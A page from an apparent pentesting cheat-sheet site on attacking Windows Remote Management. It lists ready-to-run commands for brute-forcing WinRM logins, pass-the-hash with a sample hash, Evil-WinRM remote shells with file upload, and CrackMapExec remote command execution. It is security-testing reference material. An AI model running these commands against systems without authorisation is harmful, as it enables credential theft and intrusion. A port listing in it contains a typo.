Exploit Notes
Exploit Notes

Exploits related to Windows

Active Directory

AD CS (Active Directory Certificate Services) Pentesting
AS-REP Roasting
Active Directory Pentesting
BloodHound SharpHound for Active Directory
Kerberos Pentesting
LAPS (Local Administrator Password Solution) Pentesting
LDAP (Lightweight Directory Access Protocol) Pentesting
NTLM (New Technology LAN Manager) Pentesting
Netlogon Elavasion of Privilege
SMB (Server Message Block) Pentesting

Protocol

MSRPC (Microsoft Remote Procedure Call) Pentesting
RDP (Remote Desktop Protocol) Pentesting
WinRM (Windows Remote Management) Pentesting

Privilege Escalation

Iperius Backup Service Privilege Escalation
Mimikatz
UAC Windows Privilege Escalation
Windows PrivEsc with Registry Keys
Windows PrivEsc with SeBackupPrivilege
Windows PrivEsc with Unquoted Service Path
Windows Privilege Escalation

Post Exploitation

Windows Pivoting

PowerShell

PowerShell
PowerView

Others

Dumping Windows Password Hashes
LocalPotato
Microsoft Outlook Message (.msg)
Microsoft Word Pentesting
Windows API
Windows Basic Features
Windows Disk Management
Windows Forensics
Windows Pivoting
Windows Print Spooler Service
Windows Remote Code Execution from Linux
Windows XML EventLog (EVTX)

WinRM (Windows Remote Management) Pentesting

Last modified: 2023-03-05

Windows

The Microsoft implementation of WS-Management Protocol which provides a common way for systems to access and exchange management information across an IT infrastructure. WinRM HTTP uses port 5985, and WinRM HTTPS uses port 5986. Default ports are 598, 5986.

Enumeration

Brute Force Credentials**

# CrackMapExec
poetry run crackmapexec winrm <target-ip> -d DomainName -u usernames.txt -p passwords.txt

# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_login

Evil-WinRM

Connect

Evil-WinRM is a Windows Remote Management shell for pentesting.
Below are list of commands for each situation.

evil-winrm -i <target-ip> -P 5986 -u username -p password

# Pass The Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc

# PowerShell Local Path (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts

# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -S

If you have private key and public key, you can use them for authentication.

# -S: SSL
# -k: private key
# -c: public key
evil-winrm -i <target-ip> -S -k private.key -c public.key

Commands

After connecting, we can use a lot of useful commands to exploit.
Note that we need to specify the absolute path for uploading and downloading.

# Upload a local file to Windows machine
PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat
# Download a file to local
PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt

# List all services
PS> services

CrackMapExec

CrackMapExec is a swiss army knife for pentesting networks.
The official docs says that it's recommended to use it via Poetry which is a Python package manager.

First off, move to the directory in which the CrackMapExec installed and run poetry install.

cd crackmapexec
poetry install

Then execute with poetry run.

# Login and CMD execution (-x)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -p password -x 'whoami'
# Login and PowerShell execution (-X)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -p password -X '$PSVersionTable'

# Pass the Hash and CMD execution (-x)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -H <HASH> -x 'whoami'
# Pass the Hash and PowerShell execution (-X)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -H <HASH> -X '$PSVersionTable'

OMIGOD (CVE-2021-38647)

Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE).

There are many PoC available, for instance:

References

Twitter GitHub

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.